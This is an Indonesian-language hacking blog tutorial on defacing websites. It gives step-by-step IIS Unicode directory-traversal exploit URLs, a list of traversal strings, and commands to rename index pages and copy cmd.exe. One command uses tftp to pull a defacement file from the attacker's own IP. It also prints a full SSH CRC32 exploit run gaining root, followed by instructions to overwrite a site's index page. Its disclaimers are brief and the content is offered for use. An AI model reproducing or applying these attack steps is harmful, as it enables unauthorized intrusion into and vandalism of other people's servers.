Zzzz….. *Clink* "We Come Back” (((dolby stereo))) 
pakabar sob dekaters ?? gimana da pahamin lom posting sebelumnya??
pasti rada puyeng ya!! ato malah pusingnya ampe sekarang belom sembuh ?
hehhehe, kali ini kita tambahin pusing kalian jadi 2 ( dua ) kali lipat
ato bahkan berlipat-lipat
. Gini Sob, kita tau ilmu didunia maya luas banged dan banyak sekali
kontoversi baik positif/negatif, posting kali ini bukannya ngajarin
kalian untuk berbuat jahat ato usil tapi kita hanya sekedar pengen
berbagi pengetahuan saja ga` ada motif laen dan kita juga ga
menganjurkan untuk kalian mempraktekkannya, setiap tindakan kita sudah
ada yang mencatatnya kita tahu itu.. tapi namanya juga kita hanya
manusia yang egois dan selalu mendahulukan kepuasan batin nah.. itu
awal dari kehancuran kita sendiri dan nantinya dimintai
pertanggung-jawaban dari semua itu.
Aduh, koq jadi ngelantur gini ya  ) Ok Sob , kita langusng ke pokok pembahasan tapi pesan kita "Resiko Ditanggung Masing – Masing”.
Pada posting ini kita coba membahas "deface website” apa itu ?? Deface
adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan
sebuah situs. Tentu saja prosesnya ilakukan dengan memanfaatkan
kelemahan dari situs tersebut, sehingga kalo sob adalah web master dan
sob ngerubah tampilan halaman situs yang sob punya tentu saja itu nggak
bisa disebut deface…heheheh. Banyak yang bertanya "gimana sich
nge-deface situs?” proses deface dilakukan dengan memanfaatkan lubang
(hole) yang terdapat pada server tempat situs itu berada. Sehingga hal
pertama yang harus kalian ketahui untuk melakukan proses deface adalah
OS (Operating System) dari server situs tersebut. Hal ini karena
karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS
dengan BSD tentu saja sangat berbeda apabila kita ingin melakukan
deface diantara kedua OS tsb. Operating System atau OS biasanya kalo
kita kelompikin ke 2 keluarga besar,yaitu :
1. IIS (server untuk microsoft, dkk)
2. Unix(linux,BSD,IRIX,SOLARIS,dsb)
elalui tutor ini saya teh hanya ingin
berbagi pengalaman mengenai cara men-deface website yang menggunakan
Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR
(sebutan bagi org yg suka deface..;p) ketahui…Microsoft Internet
Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang
dinamakan "unicode bug”. Sayah tidak akan menjelaskan panjang lebar
mengenai "unicode bug” ini karena sayah takut salah menjelaskan
(ssSSTTtHHH!! gn bilang sapa2 yah sebenernyah sayah teh emang gak tau
…ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi
komputer target dengan hanya menggunakan internet browser.
OK…mari kita mulai…Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)…key nya terserah
kowe…..Lalu utk mengetahui site itu
menggunakan MS IIS 4.0/5.0…Kita scan terlebih dahulu di
www.netcraft.com……dapat site yah..??…Okeh..setelah kita mendapatkan
site yg menggunakan MS IIS 4.0/5.0 …Langkah selanjutnya utk mengetahui
site tersebut belum di-patch bug unicode nya mari kita scan site
tersebut di mirc (utk mengeteahui cara scan lewat mirc….coba koe buka
http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode
Dengan MIRC),bisa juga memakai sopwer yg
bisa and DL di http://accessftp.topcities.com/…. or memakai cara manual yg lebih sering kita gunakan ehehhehehhee…contoh:
http://wwwtargethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
Ada dua kemungkinan yang tampil pada browser Anda yaitu:
Kahiji : Muncul pesan ERROR …
Kaduana : Muncul daftar file-file dari drive C pada komputer server
target. Bila ini terjadi maka
www.targethost.com tadi ada kemungkinan untuk bisa kita deface…
Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL
diatas menjadi empat bagian yaitu :
· Bagian host, yaitu "http://www.targethost.com”
· Bagian exploit string, yaitu "/scripts/..%255c..%255c”
· Bagian folder, yaitu "/winnt/system32/”
· Bagian command, yaitu "cmd.exe?/c+dir+c:\”
Kita lihat pada
bagian command diatas menunjukkan perintah "dir c:\” yang berarti
melihat seluruh file-file yang berada pada root drive C. Koe bisa
mencoba perintah yang lain seperti "dir d:\” atau yang lain. Ingat, Koe
harus mengganti karakter spasi dengan tanda "+”. Koe bahkan bisa menge
tahui konfigurasi IP address komputer tujuan dengan mengetikkan
perintah "ipconfig.exe /all”
Selain itu ada
beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error
pada browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah,
eksploit string yg sering tembus adalah :
- /cgi-bin/..%255c..%255c
- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..
- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /scripts/..%255c..%255c
Jika semua
pilihan eksploit string diatas masih memunculkan pesan error pada
browser koe maka kemungkinan besar IIS pada web server sudah di-patch
bug unicode nya (OR IE kowe yg lagie dodolss …hiheiehiehiehei). Dan koe
bisa memilih situs lain sebagai sasaran….(yg sabar yah nak nyari
targetnyah…ehehhehehe).
Lanjuttt……udeh
dapet site yg bug unicodenyah gak di patch..??….Langkah berikutnya
adalah mengetahui di folder manakah diletakkan dokumen-dokumen web
seperti
default.htm/html/asp,,index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada
juga yg pake .php/php3/shtml. Folder ini dinamakan web root. Biasanya
web root berada di C:\InetPub\wwwroot\ atau D:\InetPub\wwwroot. Tapi
terkadang web administrator menggantinya dengan yang lain. Untuk
mengetahuinya koe cukup mengetikkan URL seperti di bawah ini
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set
URL diatas akan
menampilkan daftar environment variable dari web server sasaran.
Kebuka..??…Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau
tulisan PATH_TRANSLATEDnyah…gak ada yahh ..??…coba deh koe ripresh
lagehh…udah ketemuuu…nah skrg kita DIR deh tuh si PATH_TRANSLATED
nyah…..Kita ambil contoh PATH_TRANSLATEDnyah :
C:\InetPub\wwwroot….Perintahnya ng-DIR nyah :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
Huaaaaaaa….isinyah
banyak banged yahh…..mana dokumen2 web yg kita curigain itu ada 3
bijih. lagehh… .hemm santeyy…oiyahh…lupa sayah…Tugas kita setelah
ng-DIR PATH_TRANSLATEDnyah….. truss kita cari dokumen web itu disitu
utk kita RENAME….gemana kalo misalnyah dokumen2 web yg kita curigain
itu ada 3..santeyy…coba skrg koe buka site aslinyah di laen window….
http://www.targethost.com == neh yg ini……di situ kan alias di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME….misalnya : di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
itu ada :
Directory of C:\InetPub\wwwroot
07/20/01 03:21p 1,590 default.htm
07/20/01 03:21p 590 index.html
07/20/01 03:21p 3,453 main.html
Udah di buka
kan site aslinyah…nah coba masukin salah satu dokumen web itu di site
asli nyah… contoh : http://www.targethost.com/default.htm kita liad
hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin
dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh
salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg
main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh
yg main.html ituu. perintahnya :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html
Lihat apa yg terjadi di IE kitaa
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
Access is denied
Yahhhh..akses
dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh
!!!Dapat targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME
seperti di bawah ini bukan??
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :
Kalo iyahh.waaa
selamat anda telah merubah or berhasil men-deface halaman depan web
site tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann
ehehhehehhee (Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file
yg kita rename tadi di notepad utk langkah selanjutnyah*)
Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..Kedua lewat TFTP32.
*Cara pertama :*
Utk meng-upload
file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada
direktori C:\winnt\system32 ke suatu folder lain atau folder yang sama
dengan nama lain, misalnya cmdku.exe. Untuk meng-copy cmd.exe menjadi
cmdku.exe pada folder winnt\system32 maka cukup ketik URL berikut :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\cmdku.exe
Pasti hasilnya akan seperti di bawah ini :
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :
1 file(s) copied.
Tujuan kita
meng-copy cmd.exe menjadi cmdku.exe adalah agar kita bisa menjalankan
perintah echo dengan lengkap. Apabila Anda menggunakan cmd.exe maka
perintah echo tidak bisa digunakan untuk menulis atau membuat file.
Okeih Sob skrg mari kita up-load file nya lewat perintah echo perintahnya :
dapat dilihat disini
Kita liat apa yg terjadi di IE kita.
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :
Waa..waaa.selamat anda telah berhasil meng-upload file anda lewat cara echo tadee silahkan buka web site target tadi
Oiyahh sayah uraikan sedikit URL ajaib tadii. Sayah akan membagi URL tadi menjadi empat bagian :
- Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c
- Bagian command yaitu, cmdku.exe?/c+echo+
- Bagian HTML
- Bagian PATH_TRANSLATEDnyah(rootnyah)+Dokumen webnyah yaitu,
C:\InetPub\wwwroot\main.html
Cara Kedua
Utk meng-upload file lewat TFTP32 sebelumnyah koe2 orang harus
mendownload sopwer TFTP32 terlebih dahulu di http://www.download.com
ketik keynya TFTP32 dan koe harus maen diserver (sebab di user pasti
takkan bisa). Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy
cmd.exe nyah langsung sajah.mari kita mulai meng-uploadnyah perintahnya
:
- http://www.targethost.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe
up-load)+ C:\InetPub\wwwroot\main.html
Kita liat lagi apa yg terjadi di IE kita.
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :
Waa..waaa.selamat anda telah berhasil meng-upload file anda memakai sopwer TFTP32 tadee silahkan buka web site target tadi.
Sayah akan uraikan juga URL tadee menjadi 4 bagian :
- Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c
- Bagian folder, yaitu /winnt/system32/
- Bagian command, yaitu cmd.exe?/c+tftp+-i+202.95.145.71(IPmu)+get+antique.htm(file yg mau koe up-load)+
- Bagian PATH_TRANSLATEDNYAH(rootnyah)+Dokumen webnyah yaitu,
C:\InetPub\wwwroot\main.html
Kekurangannyah dalam
meng-upload file lewat TFTP32terkadang suatu server (web site) tidak
mau menerima up-load file kita tadee.Jikalau itu terjadi maka
gunakanlah cara pertama diatas tadee.
Sebelumnya dan sesudahnyah sayah mo ngejelasin bahwa tutorial ini
tidak mempunyai maksud tertentu selain untuk ilmu pengetahuan dan
kebebasan dalam berbagi ilmu pengetahuan. Sayah tidak bertanggung jawab
apapun terhadap segala sesuatu yang terjadi akibat tutorial ini.
Tutorial ini bersifat terbuka yang berarti Anda bisa memberikan kritik
dan saran terhadap tutorial ini.
——————————————–END————————————————–
Nah itu adalah cara pemanfaatan lubang di IIS server yang dikenal
dengan nama UNICODE, untuk tambahan bahwa sekarang UNICODE telah
berkembang banyak ditemukan beberapa bug baru yang dapat dimanfaatkan
untuk masuk ke server IIS, untuk hal ini kalian bisa cari di situs2
cyber underground…hehehehe "yang kreatif donk..!!”
Okeh sekrang kita ke UNIX yah…di unix sendiri yang perlu dilakukan
untuk men-deface situs adalah memperoleh fasilitas root dari server
tsb. Cara memperoleh fasilitas root tentu saja melalui exploit
(mengenai masalah exploit bisa kalian lihat di bagian "Hacking Shell”).
Nah disini gue akan memberi salah satu contoh mendapatkan fasilitas
root dari exploit "SSH CRC32 Exploit”, exploit ini ditujukan pada SSH
server yang berjalan pada SSH protocol 1 atau SSH protocol 2 configured
to drop back to protocol 1 Ketika berjalan exploitnya akan bekerja
seperti ini :
[root@juventini]# ./x10 -t1 192.168.1.120
password:
Target: Small – SSH-1.5-1.2.26
Attacking: 192.168.1.120:22
Testing if remote sshd is vulnerable # ATTACH NOWYES #
Finding h – buf distance (estimate)
(1 ) testing 0×00000004 # SEGV #
(2 ) testing 0×0000c804 # FOUND #
Found buffer, determining exact diff
Finding h – buf distance using the teso method
(3 ) binary-search: h: 0×083fb7fc, slider: 0×00008000 # SEGV #
(4 ) binary-search: h: 0×083f77fc, slider: 0×00004000 # SURVIVED #
(5 ) binary-search: h: 0×083f97fc, slider: 0×00002000 # SURVIVED #
(6 ) binary-search: h: 0×083fa7fc, slider: 0×00001000 # SEGV #
(7 ) binary-search: h: 0×083f9ffc, slider: 0×00000800 # SEGV #
(8 ) binary-search: h: 0×083f9bfc, slider: 0×00000400 # SEGV #
(9 ) binary-search: h: 0×083f99fc, slider: 0×00000200 # SURVIVED #
(10) binary-search: h: 0×083f9afc, slider: 0×00000100 # SEGV #
(11) binary-search: h: 0×083f9a7c, slider: 0×00000080 # SEGV #
(12) binary-search: h: 0×083f9a3c, slider: 0×00000040 # SEGV #
(13) binary-search: h: 0×083f9a1c, slider: 0×00000020 # SEGV #
(14) binary-search: h: 0×083f9a0c, slider: 0×00000010 # SURVIVED #
(15) binary-search: h: 0×083f9a14, slider: 0×00000008 # SURVIVED #
Bin search done, testing result
Finding exact h – buf distance
(16) trying: 0×083f9a14 # SURVIVED #
Exact match found at: 0×000065ec
Looking for exact buffer address
Finding exact buffer address
(17) Trying: 0×080865ec # SURVIVED #
Finding distance till stack buffer
(18) Trying: 0xb7f81400 # SEGV #
(19) Trying: 0xb7f81054 # SEGV #
(20) Trying: 0xb7f80ca8 # SEGV #
(21) Trying: 0xb7f808fc # SEGV #
(22) Trying: 0xb7f80550 # SEGV #
(23) Trying: 0xb7f801a4 # SEGV #
(24) Trying: 0xb7f7fdf8 # SEGV #
(25) Trying: 0xb7f7fa4c # SEGV #
(26) Trying: 0xb7f7f6a0 # SEGV #
(27) Trying: 0xb7f7f2f4 # SEGV #
(28) Trying: 0xb7f7ef48 # SEGV #
(29) Trying: 0xb7f7eb9c # SEGV #
(30) Trying: 0xb7f7e7f0 # SEGV #
(31) Trying: 0xb7f7e444 # SEGV #
(32) Trying: 0xb7f7e098 # SURVIVED # verifying
(33) Trying: 0xb7f7e098 # SEGV # OK
Finding exact h – stack_buf distance
(34) trying: 0xb7f7de98 slider: 0×0200# SURVIVED #
(35) trying: 0xb7f7dd98 slider: 0×0100# SURVIVED #
(36) trying: 0xb7f7dd18 slider: 0×0080# SEGV #
(37) trying: 0xb7f7dd58 slider: 0×0040# SEGV #
(38) trying: 0xb7f7dd78 slider: 0×0020# SURVIVED #
(39) trying: 0xb7f7dd68 slider: 0×0010# SEGV #
(40) trying: 0xb7f7dd70 slider: 0×0008# SEGV #
(41) trying: 0xb7f7dd74 slider: 0×0004# SURVIVED #
(42) trying: 0xb7f7dd72 slider: 0×0002# SEGV #
Final stack_dist: 0xb7f7dd74
EX: buf: 0×080835ec h: 0×0807d000 ret-dist: 0xb7f7dcfa
ATTACH NOW
Changing MSW of return address to: 0×0808
Crash, finding next return address
Changing MSW of return address to: 0×0809
Crash, finding next return address
Changing MSW of return address to: 0×080a
Crash, finding next return address
EX: buf: 0×080835ec h: 0×0807d000 ret-dist: 0xb7f7dcf6
ATTACH NOW
Changing MSW of return address to: 0×0808
Crash, finding next return address
Changing MSW of return address to: 0×0809
Crash, finding next return address
Changing MSW of return address to: 0×080a
Crash, finding next return address
EX: buf: 0×080835ec h: 0×0807d000 ret-dist: 0xb7f7dcfc
ATTACH NOW
Changing MSW of return address to: 0×0808
Crash, finding next return address
Changing MSW of return address to: 0×0809
No Crash, might have worked
Reply from remote: CHRIS CHRIS
***** YOU ARE IN *****
localhost.localdomain
Linux localhost.localdomain 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000
i686
unknown
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
…..HOREEEEE…dapat root heheehehhe, nah sekarang loe udah mendapatkan
fasilitas root, okeh sekarang kita mulai men-deface situs yang tedapat
pada server tsb. Pertama-tama perlu kalian ketahui bahwa biasanya
halaman index pada server UNIX ditempatkan pada direktori tertentu,
yaitu : home/html atau home/html/httpd atau bisa juga di direktori
var/html atau var/html/httpd
naH..tunggu apa lagi coba deh loe liat-liat isi direktori itu…untuk
meyakinkannya loe buka situs tsb pada browser dan lihatlah apa nama
dari file halaman index situs itu..hmmm biasanya sich index.html atau
index.htm Udah dapat indexnya? kalo udah sekarang loe bisa echo
deh…gampang kan??? heheheh..cuman kalo gue rada malas sich make echo
mending bikin halaman baru…;)), gini caranya :
- ganti dulu nama indexnyamv index.htm oldindex.htm
- sekarang buka editor dari shell, bisa make vi atau pico : vi index.htm
- masukan HTML yang kalian buat di vi ataupun pico tadi
- buka browser kalian….heheeheh..udah ganti kan sekrang halamannya..:))) SiiiPPPP..!!
Gitu aja kok
caranya…mudah aja kan..?? hehehhe…intinya memang cuman bagaimana
mendapatkan fasilitas root pada server, dan seperti yang telah gue
bilang tadi bahwa setiap server memiliki karakteristik yang
berbeda-beda sesuai dengan OS nya masing2. Sehingga diperlukan exploit
yang berbeda apabila kita ingin mencoba menembus server yang memiliki
OS yang berbeda pula…so many exploit out thare…just get iT..!!
hehehheudah dulu yah…BUBAYYYYYY!!!!!!!!!!!!
| 
